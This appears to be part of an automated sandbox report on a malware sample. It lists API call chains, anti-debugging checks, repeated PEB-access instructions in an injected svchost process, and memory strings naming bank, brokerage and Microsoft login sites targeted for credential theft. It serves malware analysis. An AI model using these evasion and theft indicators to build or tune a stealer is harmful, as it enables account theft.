                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B6C75C
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B6EF95
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B6F0F2
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B6F3F3
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B637EF
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B63B12
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B6BCBC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E1C380 FindFirstFileW,FindNextFileW,FindClose,10_2_02E1C380
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B049A0
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 1f2Wt16K.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 1f2Wt16K.10.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 1f2Wt16K.10.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 1f2Wt16K.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 1f2Wt16K.10.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: takeown.exe, 0000000A.00000002.3659176995.0000000002E8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: 1f2Wt16K.10.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: D3y5b0UXPl.exe, 00000009.00000002.3660010355.0000000000868000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.1702927856.0000022DED26C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 1f2Wt16K.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 1f2Wt16K.10.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 1f2Wt16K.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 1f2Wt16K.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 1f2Wt16K.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 1f2Wt16K.10.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 1f2Wt16K.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 1f2Wt16K.10.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 1f2Wt16K.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 1f2Wt16K.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 1f2Wt16K.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeAPI call chain: ExitProcess graph end nodegraph_0-104600
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeAPI call chain: ExitProcess graph end nodegraph_0-104824
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0317096E rdtsc 3_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_005072E3 LdrLoadDll,3_2_005072E3
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B73F09 BlockInput,0_2_00B73F09
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B03B3A
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B35A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00B35A7C
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B04B37 LoadLibraryA,GetProcAddress,0_2_00B04B37
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_03563520 mov eax, dword ptr fs:[00000030h]0_2_03563520
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_035634C0 mov eax, dword ptr fs:[00000030h]0_2_035634C0
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_03561E70 mov eax, dword ptr fs:[00000030h]0_2_03561E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312C310 mov ecx, dword ptr fs:[00000030h]3_2_0312C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03150310 mov ecx, dword ptr fs:[00000030h]3_2_03150310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316A30B mov eax, dword ptr fs:[00000030h]3_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316A30B mov eax, dword ptr fs:[00000030h]3_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316A30B mov eax, dword ptr fs:[00000030h]3_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B035C mov eax, dword ptr fs:[00000030h]3_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B035C mov eax, dword ptr fs:[00000030h]3_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B035C mov eax, dword ptr fs:[00000030h]3_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B035C mov ecx, dword ptr fs:[00000030h]3_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B035C mov eax, dword ptr fs:[00000030h]3_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B035C mov eax, dword ptr fs:[00000030h]3_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FA352 mov eax, dword ptr fs:[00000030h]3_2_031FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B2349 mov eax, dword ptr fs:[00000030h]3_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031D437C mov eax, dword ptr fs:[00000030h]3_2_031D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0320634F mov eax, dword ptr fs:[00000030h]3_2_0320634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03128397 mov eax, dword ptr fs:[00000030h]3_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03128397 mov eax, dword ptr fs:[00000030h]3_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03128397 mov eax, dword ptr fs:[00000030h]3_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312E388 mov eax, dword ptr fs:[00000030h]3_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312E388 mov eax, dword ptr fs:[00000030h]3_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312E388 mov eax, dword ptr fs:[00000030h]3_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0315438F mov eax, dword ptr fs:[00000030h]3_2_0315438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0315438F mov eax, dword ptr fs:[00000030h]3_2_0315438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE3DB mov eax, dword ptr fs:[00000030h]3_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE3DB mov eax, dword ptr fs:[00000030h]3_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE3DB mov ecx, dword ptr fs:[00000030h]3_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE3DB mov eax, dword ptr fs:[00000030h]3_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031D43D4 mov eax, dword ptr fs:[00000030h]3_2_031D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031D43D4 mov eax, dword ptr fs:[00000030h]3_2_031D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031EC3CD mov eax, dword ptr fs:[00000030h]3_2_031EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A3C0 mov eax, dword ptr fs:[00000030h]3_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A3C0 mov eax, dword ptr fs:[00000030h]3_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A3C0 mov eax, dword ptr fs:[00000030h]3_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A3C0 mov eax, dword ptr fs:[00000030h]3_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A3C0 mov eax, dword ptr fs:[00000030h]3_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A3C0 mov eax, dword ptr fs:[00000030h]3_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031383C0 mov eax, dword ptr fs:[00000030h]3_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031383C0 mov eax, dword ptr fs:[00000030h]3_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031383C0 mov eax, dword ptr fs:[00000030h]3_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031383C0 mov eax, dword ptr fs:[00000030h]3_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B63C0 mov eax, dword ptr fs:[00000030h]3_2_031B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0314E3F0 mov eax, dword ptr fs:[00000030h]3_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0314E3F0 mov eax, dword ptr fs:[00000030h]3_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0314E3F0 mov eax, dword ptr fs:[00000030h]3_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031663FF mov eax, dword ptr fs:[00000030h]3_2_031663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031403E9 mov eax, dword ptr fs:[00000030h]3_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031403E9 mov eax, dword ptr fs:[00000030h]3_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031403E9 mov eax, dword ptr fs:[00000030h]3_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031403E9 mov eax, dword ptr fs:[00000030h]3_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031403E9 mov eax, dword ptr fs:[00000030h]3_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031403E9 mov eax, dword ptr fs:[00000030h]3_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031403E9 mov eax, dword ptr fs:[00000030h]3_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031403E9 mov eax, dword ptr fs:[00000030h]3_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312823B mov eax, dword ptr fs:[00000030h]3_2_0312823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312A250 mov eax, dword ptr fs:[00000030h]3_2_0312A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03136259 mov eax, dword ptr fs:[00000030h]3_2_03136259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031EA250 mov eax, dword ptr fs:[00000030h]3_2_031EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031EA250 mov eax, dword ptr fs:[00000030h]3_2_031EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B8243 mov eax, dword ptr fs:[00000030h]3_2_031B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B8243 mov ecx, dword ptr fs:[00000030h]3_2_031B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E0274 mov eax, dword ptr fs:[00000030h]3_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E0274 mov eax, dword ptr fs:[00000030h]3_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E0274 mov eax, dword ptr fs:[00000030h]3_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E0274 mov eax, dword ptr fs:[00000030h]3_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E0274 mov eax, dword ptr fs:[00000030h]3_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E0274 mov eax, dword ptr fs:[00000030h]3_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E0274 mov eax, dword ptr fs:[00000030h]3_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E0274 mov eax, dword ptr fs:[00000030h]3_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E0274 mov eax, dword ptr fs:[00000030h]3_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E0274 mov eax, dword ptr fs:[00000030h]3_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E0274 mov eax, dword ptr fs:[00000030h]3_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E0274 mov eax, dword ptr fs:[00000030h]3_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03134260 mov eax, dword ptr fs:[00000030h]3_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03134260 mov eax, dword ptr fs:[00000030h]3_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03134260 mov eax, dword ptr fs:[00000030h]3_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312826B mov eax, dword ptr fs:[00000030h]3_2_0312826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0320625D mov eax, dword ptr fs:[00000030h]3_2_0320625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316E284 mov eax, dword ptr fs:[00000030h]3_2_0316E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316E284 mov eax, dword ptr fs:[00000030h]3_2_0316E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B0283 mov eax, dword ptr fs:[00000030h]3_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B0283 mov eax, dword ptr fs:[00000030h]3_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B0283 mov eax, dword ptr fs:[00000030h]3_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031402A0 mov eax, dword ptr fs:[00000030h]3_2_031402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031402A0 mov eax, dword ptr fs:[00000030h]3_2_031402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C62A0 mov eax, dword ptr fs:[00000030h]3_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C62A0 mov ecx, dword ptr fs:[00000030h]3_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C62A0 mov eax, dword ptr fs:[00000030h]3_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C62A0 mov eax, dword ptr fs:[00000030h]3_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C62A0 mov eax, dword ptr fs:[00000030h]3_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C62A0 mov eax, dword ptr fs:[00000030h]3_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A2C3 mov eax, dword ptr fs:[00000030h]3_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A2C3 mov eax, dword ptr fs:[00000030h]3_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A2C3 mov eax, dword ptr fs:[00000030h]3_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A2C3 mov eax, dword ptr fs:[00000030h]3_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313A2C3 mov eax, dword ptr fs:[00000030h]3_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031402E1 mov eax, dword ptr fs:[00000030h]3_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031402E1 mov eax, dword ptr fs:[00000030h]3_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031402E1 mov eax, dword ptr fs:[00000030h]3_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_032062D6 mov eax, dword ptr fs:[00000030h]3_2_032062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DA118 mov ecx, dword ptr fs:[00000030h]3_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DA118 mov eax, dword ptr fs:[00000030h]3_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DA118 mov eax, dword ptr fs:[00000030h]3_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DA118 mov eax, dword ptr fs:[00000030h]3_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F0115 mov eax, dword ptr fs:[00000030h]3_2_031F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE10E mov eax, dword ptr fs:[00000030h]3_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE10E mov ecx, dword ptr fs:[00000030h]3_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE10E mov eax, dword ptr fs:[00000030h]3_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE10E mov eax, dword ptr fs:[00000030h]3_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE10E mov ecx, dword ptr fs:[00000030h]3_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE10E mov eax, dword ptr fs:[00000030h]3_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE10E mov eax, dword ptr fs:[00000030h]3_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE10E mov ecx, dword ptr fs:[00000030h]3_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE10E mov eax, dword ptr fs:[00000030h]3_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DE10E mov ecx, dword ptr fs:[00000030h]3_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03160124 mov eax, dword ptr fs:[00000030h]3_2_03160124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312C156 mov eax, dword ptr fs:[00000030h]3_2_0312C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C8158 mov eax, dword ptr fs:[00000030h]3_2_031C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03204164 mov eax, dword ptr fs:[00000030h]3_2_03204164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03204164 mov eax, dword ptr fs:[00000030h]3_2_03204164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03136154 mov eax, dword ptr fs:[00000030h]3_2_03136154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03136154 mov eax, dword ptr fs:[00000030h]3_2_03136154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C4144 mov eax, dword ptr fs:[00000030h]3_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C4144 mov eax, dword ptr fs:[00000030h]3_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C4144 mov ecx, dword ptr fs:[00000030h]3_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C4144 mov eax, dword ptr fs:[00000030h]3_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C4144 mov eax, dword ptr fs:[00000030h]3_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B019F mov eax, dword ptr fs:[00000030h]3_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B019F mov eax, dword ptr fs:[00000030h]3_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B019F mov eax, dword ptr fs:[00000030h]3_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B019F mov eax, dword ptr fs:[00000030h]3_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312A197 mov eax, dword ptr fs:[00000030h]3_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312A197 mov eax, dword ptr fs:[00000030h]3_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312A197 mov eax, dword ptr fs:[00000030h]3_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03170185 mov eax, dword ptr fs:[00000030h]3_2_03170185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031EC188 mov eax, dword ptr fs:[00000030h]3_2_031EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031EC188 mov eax, dword ptr fs:[00000030h]3_2_031EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031D4180 mov eax, dword ptr fs:[00000030h]3_2_031D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031D4180 mov eax, dword ptr fs:[00000030h]3_2_031D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_032061E5 mov eax, dword ptr fs:[00000030h]3_2_032061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031AE1D0 mov eax, dword ptr fs:[00000030h]3_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031AE1D0 mov eax, dword ptr fs:[00000030h]3_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]3_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031AE1D0 mov eax, dword ptr fs:[00000030h]3_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031AE1D0 mov eax, dword ptr fs:[00000030h]3_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F61C3 mov eax, dword ptr fs:[00000030h]3_2_031F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F61C3 mov eax, dword ptr fs:[00000030h]3_2_031F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031601F8 mov eax, dword ptr fs:[00000030h]3_2_031601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0314E016 mov eax, dword ptr fs:[00000030h]3_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0314E016 mov eax, dword ptr fs:[00000030h]3_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0314E016 mov eax, dword ptr fs:[00000030h]3_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0314E016 mov eax, dword ptr fs:[00000030h]3_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B4000 mov ecx, dword ptr fs:[00000030h]3_2_031B4000
